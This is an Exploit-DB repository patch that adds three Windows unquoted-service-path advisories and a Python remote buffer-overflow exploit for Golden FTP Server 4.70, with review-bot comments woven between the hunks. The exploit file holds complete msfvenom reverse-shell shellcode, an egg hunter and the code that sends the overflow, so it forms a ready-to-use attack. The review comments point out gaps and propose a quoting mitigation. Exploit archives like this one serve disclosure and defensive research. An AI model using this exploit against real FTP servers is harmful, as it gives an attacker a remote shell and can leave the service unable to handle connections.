From 9a9ff3d28813fdf5cc925f8e4dc0875bd69b888b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 10 Mar 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-03-10 4 changes to exploits/shellcodes FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2) --- exploits/windows/local/49630.txt | 30 ++++++++++++ exploits/windows/local/49631.txt | 29 ++++++++++++ exploits/windows/local/49632.txt | 28 +++++++++++ exploits/windows/remote/49629.py | 81 ++++++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 172 insertions(+) create mode 100644 exploits/windows/local/49630.txt create mode 100644 exploits/windows/local/49631.txt create mode 100644 exploits/windows/local/49632.txt create mode 100755 exploits/windows/remote/49629.py diff --git a/exploits/windows/local/49630.txt b/exploits/windows/local/49630.txt new file mode 100644 index 000000000..47849031e --- /dev/null +++ b/exploits/windows/local/49630.txt 
@@ -0,0 +1,30 @@
+# Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path
+# Date: 2021-1-20
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: www.freelan.org
+# Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe
+# Version: Version 2.2
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc "FreeLAN Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FreeLAN Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\FreeLAN\bin\freelan.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : FreeLAN Service
+ DEPENDENCIES : tap0901
+ : Dhcp
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49631.txt b/exploits/windows/local/49631.txt
new file mode 100644
index 000000000..c857f4586
--- /dev/null
+++ b/exploits/windows/local/49631.txt
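Review bot: The advisory records only the `sc qc` output and does not state whether any directory along `C:\Program Files\FreeLAN\bin\freelan.exe` (`C:\`, `C:\Program Files`, `C:\Program Files\FreeLAN`) is writable by a non-administrative account, which is what decides whether the unquoted path is exploitable at all — by default `C:\Program Files` is not writable by standard users. I would add a header line such as `# Writable directories on the path: <icacls result, or "none on a default install">` so a reader can judge the actual risk, and a mitigation line, e.g. quoting the path with `sc config "FreeLAN Service" binPath= "\"C:\Program Files\FreeLAN\bin\freelan.exe\""`. The same omission applies to 49631.txt (`SbieSvc`) and 49632.txt (`waselvpnserv`) in the following hunks.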
@@ -0,0 +1,29 @@
+# Exploit Title: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path
+# Date: 2021-1-20
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: sandboxie-plus.com
+# Software Link: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.2/Sandboxie-Plus-x64-v0.7.2.exe
+# Version: Version 0.7.2
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc SbieSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SbieSvc
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
+ LOAD_ORDER_GROUP : UIGroup
+ TAG : 0
+ DISPLAY_NAME : Sandboxie Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49632.txt b/exploits/windows/local/49632.txt
new file mode 100644
index 000000000..6fbcf8eb9
--- /dev/null
+++ b/exploits/windows/local/49632.txt
@@ -0,0 +1,28 @@
+# Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
+# Date: 2021-1-19
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: https://carolcoral.github.io/no-free_vpn/
+# Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe
+# Version: Version 2.5.1
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc "waselvpnserv"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: waselvpnserv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : waselvpnserv
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/remote/49629.py b/exploits/windows/remote/49629.py
new file mode 100755
index 000000000..18b06ff96
--- /dev/null
+++ b/exploits/windows/remote/49629.py
@@ -0,0 +1,81 @@ +# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2) +# Author: 1F98D +# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) +# Tested on Windows 10 (x64) +# +# A buffer overflow exists in GoldenFTP during the authentication process. +# Note that the source ip address of the user performing the authentication +# forms part of the buffer and as such must be accounted for when calculating +# the appropriate offset. It should also be noted that the exploit is +# rather unstable and if exploitation fails, GoldenFTP will be left in +# a state where it will still accept connections, but it will be unable +# to handle or process them in anyway, so be careful. +# +#!/usr/local/bin/python3 + +from socket import * +import sys + +# Your address forms part of the buffer length calculation +SOURCE = '192.168.1.1' +TARGET = '192.168.1.2' +s = socket(AF_INET, SOCK_STREAM) +s.connect((TARGET, 21)) + +# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444 +buf = b"" +buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29" +buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48" +buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71" +buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a" +buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38" +buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf" +buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7" +buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a" +buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9" +buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b" +buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a" +buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe" +buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc" +buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5" +buf += 
b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83" +buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63" +buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16" +buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4" +buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde" +buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3" +buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e" +buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06" +buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc" +buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96" +buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1" +buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e" +buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6" + +total_length = 545-len(SOURCE) +eip = b'\x7f\x79\x4c\x00' +hunter = b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset base on source ip +hunter += b'\xfd' # std ; set df flag so we search high to low +hunter += b'\xb8\x43\x42\x41\x40' # mov eax, 0x40414243 ; egg +hunter += b'\x89\xF7' # mov edi, esi ; start searching from esi +hunter += b'\x47' # inc edi +hunter += b'\x90' # nop +hunter += b'\x83\xC7\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1 +hunter += b'\xaf' # scasd ; check for egg at edi +hunter += b'\x75\xfa' # short jnz -0x6 ; jump back to add edi, 0x3 +hunter += b'\x83\xC7\x03' # add edi, 0x3 +hunter += b'\xaf' # scasd +hunter += b'\x75\xfa' # short jnz -0x6 +hunter += b'\x83\xC7\x1f' # add edi, 0x1f ; account for egg hunter +hunter += b'\xff\xe7' # jmp edi ; egg found, let's go! 
+hunter += b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset again + +payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip + +s.send(b'USER anonymous\r\n') +print(s.recv(1024)) +print(s.recv(1024)) +s.send(b'PASS ' + payload + b'\r\n') +print(s.recv(1024)) +s.send(b'QUIT\r\n') +print(s.recv(1024)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 56d2d3729..0c273983f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11277,6 +11277,9 @@ id,file,description,date,author,type,platform,port 49623,exploits/windows/local/49623.txt,"Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows, 49624,exploits/windows/local/49624.txt,"Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows, 49626,exploits/windows/local/49626.txt,"Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows, +49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, +49631,exploits/windows/local/49631.txt,"Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, +49632,exploits/windows/local/49632.txt,"bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
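Review bot: The `#!/usr/local/bin/python3` line is placed after the header comment block (line 14 of the new file), where it is only a comment; a shebang takes effect solely as the first line of the file, which matters here because the file is added with mode 100755. The header also says a failed run leaves GoldenFTP accepting but not processing connections, which amounts to a denial of service of the FTP service until it is restarted and should be stated as the impact a reader must expect, e.g. `# Failure impact: the FTP service stops handling connections until restarted (denial of service).`. `from socket import *` is a wildcard import that PEP 8 discourages; `import socket` keeps the names explicit.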
@@ -18396,6 +18399,7 @@ id,file,description,date,author,type,platform,port
 49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows,
 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux,
 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
+49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
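Review bot: The new row leaves the trailing `port` column empty although the script it indexes connects to TCP 21 (`s.connect((TARGET, 21))` in 49629.py); other remote rows in the earlier hunk of this file, such as `1,exploits/windows/remote/1.c,...,remote,windows,80`, populate it. I would write the row as `49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows,21` so that filtering the index by port finds it.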